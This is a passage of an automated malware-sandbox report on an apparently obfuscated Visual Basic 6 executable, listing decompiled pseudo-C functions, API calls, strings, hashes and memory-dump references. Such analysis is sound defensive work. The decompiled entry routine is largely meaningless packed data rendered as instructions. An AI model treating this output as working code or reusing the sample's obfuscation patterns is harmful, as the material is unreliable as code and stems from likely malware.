				_v72 = _v72 | 0xffffffff;
				_v80 = 0xb;
				_push(0x10);
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Visible");
				_push(_v28);
				L004015E0();
				_v72 = _v72 & 0x00000000;
				_v80 = 0x8002;
				_push(0);
				_push(L"Left");
				_push(_v28);
				_t68 =  &_v48;
				_push(_t68);
				L004015E6();
				_push(_t68);
				_t69 =  &_v80;
				_push(_t69);
				L0040165E();
				_v132 = _t69;
				L0040167C();
				_t70 = _v132;
				if(_t70 != 0) {
					_push(0xc3);
					L0040162E();
				}
				_push(0x41259f);
				L004016AC();
				return _t70;
			}























                                  0x004123b8
                                  0x004123c7
                                  0x004123d1
                                  0x004123d9
                                  0x004123dc
                                  0x004123e3
                                  0x004123f2
                                  0x004123f5
                                  0x004123fc
                                  0x00412403
                                  0x0041240a
                                  0x0041241d
                                  0x00412423
                                  0x00412425
                                  0x0041242c
                                  0x0041244b
                                  0x0041242e
                                  0x0041242e
                                  0x00412433
                                  0x00412438
                                  0x0041243b
                                  0x0041243e
                                  0x00412443
                                  0x00412443
                                  0x00412452
                                  0x00412455
                                  0x0041245f
                                  0x00412460
                                  0x00412461
                                  0x00412462
                                  0x00412463
                                  0x00412466
                                  0x00412470
                                  0x00412471
                                  0x00412472
                                  0x00412473
                                  0x00412474
                                  0x00412476
                                  0x0041247b
                                  0x0041247e
                                  0x00412481
                                  0x00412482
                                  0x0041248a
                                  0x0041248b
                                  0x00412490
                                  0x00412494
                                  0x00412495
                                  0x0041249d
                                  0x004124a5
                                  0x004124aa
                                  0x004124b1
                                  0x004124b8
                                  0x004124bb
                                  0x004124c5
                                  0x004124c6
                                  0x004124c7
                                  0x004124c8
                                  0x004124c9
                                  0x004124ce
                                  0x004124d1
                                  0x004124d6
                                  0x004124dd
                                  0x004124e4
                                  0x004124e7
                                  0x004124f1
                                  0x004124f2
                                  0x004124f3
                                  0x004124f4
                                  0x004124f5
                                  0x004124fa
                                  0x004124fd
                                  0x00412502
                                  0x00412506
                                  0x0041250d
                                  0x00412510
                                  0x0041251a
                                  0x0041251b
                                  0x0041251c
                                  0x0041251d
                                  0x0041251e
                                  0x00412523
                                  0x00412526
                                  0x0041252b
                                  0x0041252f
                                  0x00412536
                                  0x00412538
                                  0x0041253d
                                  0x00412540
                                  0x00412543
                                  0x00412544
                                  0x0041254c
                                  0x0041254d
                                  0x00412550
                                  0x00412551
                                  0x00412556
                                  0x0041255d
                                  0x00412562
                                  0x00412568
                                  0x0041256a
                                  0x0041256f
                                  0x0041256f
                                  0x00412574
                                  0x00412599
                                  0x0041259e

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004123D1
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,004014B8,00402564,00000218), ref: 0041243E
                                  • __vbaChkstk.MSVBVM60 ref: 00412455
                                  • __vbaChkstk.MSVBVM60 ref: 00412466
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Add,00000002), ref: 00412482
                                  • __vbaObjVar.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041248B
                                  • __vbaObjSetAddref.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 00412495
                                  • __vbaFreeObj.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 0041249D
                                  • __vbaFreeVar.MSVBVM60(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004014F6), ref: 004124A5
                                  • __vbaChkstk.MSVBVM60 ref: 004124BB
                                  • __vbaLateMemSt.MSVBVM60(?,Left), ref: 004124D1
                                  • __vbaChkstk.MSVBVM60(?,Left), ref: 004124E7
                                  • __vbaLateMemSt.MSVBVM60(?,Top,?,Left), ref: 004124FD
                                  • __vbaChkstk.MSVBVM60(?,Top,?,Left), ref: 00412510
                                  • __vbaLateMemSt.MSVBVM60(?,Visible,?,Top,?,Left), ref: 00412526
                                  • __vbaLateMemCallLd.MSVBVM60(?,?,Left,00000000,?,Visible,?,Top,?,Left), ref: 00412544
                                  • __vbaVarTstEq.MSVBVM60(00008002,00000000), ref: 00412551
                                  • __vbaFreeVar.MSVBVM60(00008002,00000000), ref: 0041255D
                                  • #570.MSVBVM60(000000C3,00008002,00000000), ref: 0041256F
                                  • __vbaFreeObj.MSVBVM60(0041259F,00008002,00000000), ref: 00412599
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Chkstk$Late$Free$Call$#570AddrefCheckHresult
                                  • String ID: Add$Left$Subvitalized$Top$VB.VscrollBar$Visible
                                  • API String ID: 1265526610-1223836639
                                  • Opcode ID: 29f540c9893e7a8e24ad921d65fc040109d9cfffb0b9ea97fef3e41958a1ce2b
                                  • Instruction ID: bda52bb4a7c328fa2efead11eae96dbb6e6091ed4cba4276137ec302970bdfc5
                                  • Opcode Fuzzy Hash: 29f540c9893e7a8e24ad921d65fc040109d9cfffb0b9ea97fef3e41958a1ce2b
                                  • Instruction Fuzzy Hash: 66518171C40608ABDF11EFA5CD4ABDEBBB5AF04708F10842AF500BB1E1CBBD65468B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411352, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 66COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 53%
                                  			E00411352(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				char _v48;
				intOrPtr _v56;
				intOrPtr _v64;
				short _v68;
				signed int _t24;
				char* _t28;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t44 = _t43 - 0xc;
				 *[fs:0x0] = _t44;
				L004014F0();
				_v16 = _t44;
				_v12 = 0x4013b8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x34,  *[fs:0x0], 0x4014f6, _t41);
				L004016A6();
				_v56 = 0x80020004;
				_v64 = 0xa;
				_t24 = 0x10;
				L004014F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(L"Opnaaelige2");
				_push(L"Parra3");
				_push(L"Sangrias8"); // executed
				L004015B0(); // executed
				L0040161C();
				_push(_t24);
				_push(0);
				L00401694();
				asm("sbb eax, eax");
				_v68 =  ~( ~( ~_t24));
				L0040169A();
				_t28 = _v68;
				if(_t28 != 0) {
					_push(0);
					_push(L"skoledagen");
					_t28 =  &_v48;
					_push(_t28);
					L004015AA();
					L0040167C();
				}
				_push(0x411437);
				L0040169A();
				return _t28;
			}

















                                  0x00411355
                                  0x00411364
                                  0x0041136e
                                  0x00411376
                                  0x00411379
                                  0x00411380
                                  0x0041138f
                                  0x00411398
                                  0x0041139d
                                  0x004113a4
                                  0x004113ad
                                  0x004113ae
                                  0x004113b8
                                  0x004113b9
                                  0x004113ba
                                  0x004113bb
                                  0x004113bc
                                  0x004113c1
                                  0x004113c6
                                  0x004113cb
                                  0x004113d5
                                  0x004113da
                                  0x004113db
                                  0x004113dd
                                  0x004113e4
                                  0x004113ea
                                  0x004113f1
                                  0x004113f6
                                  0x004113fc
                                  0x004113fe
                                  0x00411400
                                  0x00411405
                                  0x00411408
                                  0x00411409
                                  0x00411411
                                  0x00411411
                                  0x00411416
                                  0x00411431
                                  0x00411436

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 0041136E
                                  • __vbaStrCopy.MSVBVM60(?,?,?,?,004014F6), ref: 00411398
                                  • __vbaChkstk.MSVBVM60 ref: 004113AE
                                  • #689.MSVBVM60(Sangrias8,Parra3,Opnaaelige2), ref: 004113CB
                                  • __vbaStrMove.MSVBVM60(Sangrias8,Parra3,Opnaaelige2), ref: 004113D5
                                  • __vbaStrCmp.MSVBVM60(00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 004113DD
                                  • __vbaFreeStr.MSVBVM60(00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 004113F1
                                  • #716.MSVBVM60(?,skoledagen,00000000,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411409
                                  • __vbaFreeVar.MSVBVM60(?,skoledagen,00000000,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411411
                                  • __vbaFreeStr.MSVBVM60(00411437,00000000,00000000,Sangrias8,Parra3,Opnaaelige2), ref: 00411431
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$Chkstk$#689#716CopyMove
                                  • String ID: Opnaaelige2$Parra3$Sangrias8$skoledagen
                                  • API String ID: 3645796391-2988273925
                                  • Opcode ID: 67e87e2191633ea66f716e4b04d19ebd8eb93945fef15bdf31911c7170bf136f
                                  • Instruction ID: 8acaa09a501a4461ed79e6a2f68cb92591dcdf41081313f50d5f5045f85446ec
                                  • Opcode Fuzzy Hash: 67e87e2191633ea66f716e4b04d19ebd8eb93945fef15bdf31911c7170bf136f
                                  • Instruction Fuzzy Hash: E2116370940209ABCB00EFA5CD46FEE7778AF04B04F50842BF501BB2E1DBBDA9058B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004105BB, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 102COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 61%
                                  			E004105BB(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				char* _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				char _v124;
				void* _v160;
				signed int _v164;
				signed int _v176;
				short _t58;
				char* _t61;
				char* _t62;
				signed int _t69;
				void* _t79;
				void* _t81;
				intOrPtr _t82;

				_t82 = _t81 - 0xc;
				 *[fs:0x0] = _t82;
				L004014F0();
				_v16 = _t82;
				_v12 = 0x401320;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4014f6, _t79);
				_v100 = L"9:9:9";
				_v108 = 8;
				L00401634();
				_push( &_v44);
				_push( &_v60); // executed
				L00401628(); // executed
				_v116 = 9;
				_v124 = 0x8002;
				_push( &_v60);
				_t58 =  &_v124;
				_push(_t58);
				L00401688();
				_v160 = _t58;
				_push( &_v60);
				_push( &_v44);
				_push(2);
				L00401676();
				_t61 = _v160;
				if(_t61 != 0) {
					L00401622();
					_t62 =  &_v28;
					L00401652();
					_v160 = _t62;
					_v84 = 0x80020004;
					_v92 = 0xa;
					_v68 = 0x80020004;
					_v76 = 0xa;
					_v52 = 0x80020004;
					_v60 = 0xa;
					_v36 = 0x80020004;
					_v44 = 0xa;
					_t69 =  *((intOrPtr*)( *_v160 + 0x44))(_v160, 0x41fe,  &_v44,  &_v60,  &_v76,  &_v92, _t62, _t61);
					asm("fclex");
					_v164 = _t69;
					if(_v164 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x44);
						_push(0x402ba8);
						_push(_v160);
						_push(_v164);
						L004016B2();
						_v176 = _t69;
					}
					L004016AC();
					_push( &_v92);
					_push( &_v76);
					_push( &_v60);
					_t61 =  &_v44;
					_push(_t61);
					_push(4);
					L00401676();
				}
				_push(0x41075e);
				return _t61;
			}





























                                  0x004105be
                                  0x004105cd
                                  0x004105d9
                                  0x004105e1
                                  0x004105e4
                                  0x004105eb
                                  0x004105fa
                                  0x004105fd
                                  0x00410604
                                  0x00410611
                                  0x00410619
                                  0x0041061d
                                  0x0041061e
                                  0x00410623
                                  0x0041062a
                                  0x00410634
                                  0x00410635
                                  0x00410638
                                  0x00410639
                                  0x0041063e
                                  0x00410648
                                  0x0041064c
                                  0x0041064d
                                  0x0041064f
                                  0x00410657
                                  0x00410660
                                  0x00410666
                                  0x0041066c
                                  0x00410670
                                  0x00410675
                                  0x0041067b
                                  0x00410682
                                  0x00410689
                                  0x00410690
                                  0x00410697
                                  0x0041069e
                                  0x004106a5
                                  0x004106ac
                                  0x004106d6
                                  0x004106d9
                                  0x004106db
                                  0x004106e8
                                  0x0041070a
                                  0x004106ea
                                  0x004106ea
                                  0x004106ec
                                  0x004106f1
                                  0x004106f7
                                  0x004106fd
                                  0x00410702
                                  0x00410702
                                  0x00410714
                                  0x0041071c
                                  0x00410720
                                  0x00410724
                                  0x00410725
                                  0x00410728
                                  0x00410729
                                  0x0041072b
                                  0x00410730
                                  0x00410733
                                  0x00000000

                                  APIs
                                  • __vbaChkstk.MSVBVM60(?,004014F6), ref: 004105D9
                                  • __vbaVarDup.MSVBVM60 ref: 00410611
                                  • #547.MSVBVM60(?,?), ref: 0041061E
                                  • __vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?), ref: 00410639
                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?), ref: 0041064F
                                  • #685.MSVBVM60(?,?,004014F6), ref: 00410666
                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,004014F6), ref: 00410670
                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402BA8,00000044), ref: 004106FD
                                  • __vbaFreeObj.MSVBVM60(00000000,?,00402BA8,00000044), ref: 00410714
                                  • __vbaFreeVarList.MSVBVM60(00000004,0000000A,0000000A,0000000A,0000000A), ref: 0041072B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.347267771.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.347245654.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347316958.0000000000413000.00000004.00020000.sdmp Download File
                                  • Associated: 00000000.00000002.347334794.0000000000415000.00000002.00020000.sdmp Download File
                                  Similarity
                                  • API ID: __vba$Free$List$#547#685CheckChkstkHresult
                                  • String ID: 9:9:9
                                  • API String ID: 3853965478-2761145665
                                  • Opcode ID: e6e8d32ea404d5b2884cd8068c77bfd45c96cc806da90c879165d7749ad3caca
                                  • Instruction ID: dda1404a73d44c945a32a96b740ece8eee3b50add7915fcce8b7d7d86ee88f89
                                  • Opcode Fuzzy Hash: e6e8d32ea404d5b2884cd8068c77bfd45c96cc806da90c879165d7749ad3caca
                                  • Instruction Fuzzy Hash: 1141D4B1900218EFEB11EF91CC85FDEBBB8BB04304F14456AE105BA291D779A989CF65
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004016D8, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 150COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 74%
                                  			_entry_(signed int __eax, signed int __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, char _a1, intOrPtr* _a4, intOrPtr _a64, char _a83, void* _a109, char _a110, intOrPtr _a630456384) {
				char _v1;
				intOrPtr _v8;
				intOrPtr _v28;
				char _v32;
				short _v36;
				long long _v44;
				long long _v52;
				signed int _v54;
				short _v56;
				short _v60;
				short _v64;
				signed int _v66;
				char _v68;
				intOrPtr _v70;
				char _v72;
				intOrPtr* _v74;
				short _v76;
				intOrPtr _v80;
				long long _v88;
				short _v92;
				intOrPtr _v96;
				char _v100;
				short _v104;
				intOrPtr _v108;
				char _v112;
				long long _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				void* _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				intOrPtr _v168;
				char _v172;
				intOrPtr _v176;
				char _v180;
				signed int _v184;
				signed int _v188;
				intOrPtr* _v192;
				signed int _v196;
				char _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				intOrPtr _v65472;
				intOrPtr _v24247169;
				intOrPtr _v1191165918;
				intOrPtr* _t744;
				signed int _t747;
				intOrPtr* _t748;
				signed char _t750;
				signed char _t751;
				signed char _t752;
				intOrPtr* _t753;
				void* _t754;
				signed char _t755;
				intOrPtr* _t757;
				signed int _t759;
				intOrPtr* _t761;
				intOrPtr* _t762;
				signed char _t763;
				intOrPtr* _t764;
				intOrPtr* _t765;
				intOrPtr* _t766;
				intOrPtr* _t767;
				signed char _t771;
				signed int _t773;
				signed int _t777;
				intOrPtr* _t778;
				signed int _t782;
				signed int _t783;
				intOrPtr* _t784;
				intOrPtr* _t787;
				intOrPtr* _t790;
				intOrPtr* _t793;
				intOrPtr* _t794;
				signed int _t795;
				char* _t798;
				intOrPtr* _t799;
				intOrPtr* _t800;
				intOrPtr* _t801;
				intOrPtr* _t802;
				intOrPtr* _t803;
				signed char _t804;
				signed char _t805;
				signed char _t806;
				signed int _t808;
				signed char _t809;
				signed char _t810;
				intOrPtr* _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed char _t817;
				signed char _t820;
				signed int _t826;
				signed char _t831;
				signed char _t836;
				signed int _t839;
				signed int _t841;
				signed int _t843;
				signed int _t858;
				signed int _t863;
				signed int _t876;
				signed int _t895;
				signed int _t903;
				signed int _t923;
				signed int _t940;
				signed int _t949;
				signed int _t960;
				signed int _t997;
				signed int _t1014;
				signed int _t1022;
				signed int _t1027;
				signed int _t1045;
				signed int _t1049;
				signed int _t1073;
				signed int _t1080;
				signed int _t1088;
				signed int _t1093;
				signed int _t1103;
				signed int _t1110;
				signed int _t1113;
				void* _t1117;
				intOrPtr* _t1129;
				signed int _t1131;
				signed char _t1132;
				signed char _t1133;
				signed int _t1134;
				signed int _t1136;
				void* _t1137;
				signed int _t1138;
				signed int _t1139;
				signed int _t1141;
				signed int _t1142;
				signed int _t1143;
				void* _t1146;
				intOrPtr* _t1147;
				void* _t1151;
				void* _t1152;
				signed int _t1153;
				signed int* _t1155;
				signed int* _t1156;
				signed char _t1157;
				signed char _t1160;
				char* _t1171;
				char* _t1173;
				char* _t1174;
				char* _t1176;
				char* _t1177;
				char* _t1180;
				void* _t1188;
				intOrPtr* _t1190;
				signed int _t1191;
				intOrPtr* _t1208;
				intOrPtr* _t1209;
				intOrPtr* _t1211;
				intOrPtr* _t1212;
				void* _t1215;
				signed int _t1217;
				void* _t1221;
				char* _t1223;
				void* _t1230;
				void* _t1232;
				void* _t1234;
				signed int _t1237;
				intOrPtr* _t1238;
				void* _t1239;
				void* _t1240;
				long long* _t1241;
				long long* _t1242;
				long long* _t1243;
				intOrPtr _t1249;
				signed int _t1250;
				intOrPtr _t1251;
				intOrPtr _t1263;
				void* _t1276;
				signed int _t1277;
				intOrPtr _t1323;
				long long _t1324;

				_t1208 = __edi;
				_t1145 = __ebx;
				L004016D0(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t744 = __eax + 1;
				 *_t744 =  *_t744 + _t744;
				 *_t744 =  *_t744 + _t744;
				 *_t744 =  *_t744 + _t744;
				_t1211 = __esi - 1;
				asm("xlatb");
				_t1185 = 0xd7;
				_t1155 = __ecx - 1;
				asm("int3");
				_t747 = _t744 + 0x00000001 &  *(__ebx - 0x75);
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				 *_t747 =  *_t747 + _t747;
				0x694314a4("VB5!6&*");
				asm("insd");
				asm("insd");
				if( *_t747 == 0) {
					asm("bound ebp, [ecx+0x6f]");
					asm("insb");
					asm("outsd");
					_t1142 =  *(__ebx + _t1211) * 0x4108;
					 *_t1142 =  *_t1142 + _t1142;
					_t1153 = __ebx + __ebx;
					asm("int3");
					 *_t1142 =  *_t1142 ^ _t1142;
					_v24247169 = _v24247169 + _t1153;
					_t5 = _t1142 + 0x44;
					_t1185 =  *_t5;
					 *_t5 = 0xd7;
					_t1143 = _t1217;
					_t1217 = _t1142;
					asm("adc al, 0x60");
					asm("invalid");
					asm("sbb ch, [edi-0x4c]");
					 *0xb81d217f = _t1143;
					_t1211 = _t1211 + 1;
					_t1324 =  *((long long*)(_t1155 - 0x65));
					asm("invalid");
					_t747 = 0xad4f3ac5;
					_t1145 = _t1153 ^  *(_t1155 - 0x48ee309a);
					asm("cdq");
					asm("iretw");
					asm("adc [edi+0xaa000c], esi");
					asm("pushad");
					asm("rcl dword [ebx], cl");
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					_push(_t1230);
					 *0xad4f3ac5 =  *0xad4f3ac5 + 0xad4f3ac5;
					 *__edi =  *__edi + _t1155;
				}
				 *_t747 =  *_t747 + _t747;
				 *_t1145 =  *_t1145 + _t1155;
				_t12 = _t747 + 0x68;
				 *_t12 =  *((intOrPtr*)(_t747 + 0x68)) + _t1185;
				_t1249 =  *_t12;
				asm("outsd");
				if(_t1249 == 0) {
					L12:
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					 *_t747 =  *_t747 + _t747;
					goto L13;
				} else {
					if(_t1249 == 0) {
						L13:
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t1185;
						 *_t747 =  *_t747 + _t747;
						L14:
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						L15:
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						L16:
						 *_t1217 =  *_t1217 + _t1155;
						L17:
						asm("lodsd");
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						L18:
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t1208 =  *_t1208 - _t1185;
						_t748 = _t747 + 1;
						 *((intOrPtr*)(_t748 + _t748)) =  *((intOrPtr*)(_t748 + _t748)) + _t1155;
						 *_t748 =  *_t748 + _t1185;
						 *_t748 =  *_t748 + _t748;
						_t1217 = _t1208;
						asm("movsb");
						_push(_t1145);
						_t1185 = 0x16;
						_t747 =  *0x79f88f4e ^ 0x000000bc;
						asm("wait");
						asm("invalid");
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t1155 =  *_t1155 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						if( *_t747 >= 0) {
							goto L16;
						}
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						 *_t747 =  *_t747 + _t747;
						asm("hlt");
						 *_t747 =  *_t747 ^ _t747;
						asm("pushfd");
						 *_t747 =  *_t747 + _t747;
						 *((intOrPtr*)(_t1211 + 0x42)) =  *((intOrPtr*)(_t1211 + 0x42)) + 0x16;
						_t750 = _t747 ^ 0x2a263621;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t1211 =  *_t1211 + _t1145;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						 *_t750 =  *_t750 + _t750;
						_t751 = _t750 |  *_t750;
						asm("adc [eax+eax], al");
						 *_t751 =  *_t751 + _t751;
						 *_t751 =  *_t751 + _t751;
						 *_t751 =  *_t751 + _t751;
						 *_t751 =  *_t751 + _t751;
						 *_t751 =  *_t751 + _t751;
						asm("sbb [eax], eax");
						_t752 = _t751 + 0x16;
						 *_t1155 =  *_t1155 ^ _t752;
						_t1146 = _t1145 + _t1145;
						asm("invalid");
						 *_t752 =  *_t752 | _t752;
						 *_t752 =  *_t752 + _t752;
						 *_t752 =  *_t752 + _t752;
						 *_t752 =  *_t752 + _t752;
						_t753 = _t752 +  *_t752;
						 *_t753 =  *_t753 + _t753;
						goto 0xe04018cd;
						_pop(ss);
						_t754 = _t753 + 1;
						 *((intOrPtr*)(_t754 - 0x1bffbfe3)) =  *((intOrPtr*)(_t754 - 0x1bffbfe3)) + _t1155;
						_t755 = _t754 + 1;
						 *_t755 =  *_t755 + _t1146;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *__eax = ss;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *_t755 =  *_t755 + _t755;
						 *((intOrPtr*)(_t755 + 0x45)) =  *((intOrPtr*)(_t755 + 0x45)) + 0x16;
						_t1212 = _t1211 - 1;
						_t1209 = _t1208 + 1;
						_push(_t1146);
						_t1232 = _t1230 + 1 - 1;
						_push(0x16);
						_push(_t1146);
						_t34 = _t1212 + 0x72;
						 *_t34 =  *((intOrPtr*)(_t1212 + 0x72)) + _t755;
						_t1263 =  *_t34;
						if(_t1263 != 0) {
							L27:
							 *_t755 =  *_t755 + _t755;
							 *_t755 =  *_t755 + _t755;
							goto L28;
						} else {
							if(_t1263 == 0) {
								L26:
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								goto L27;
							}
							asm("popad");
							if(_t1263 < 0) {
								L28:
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
								 *_t755 =  *_t755 + _t755;
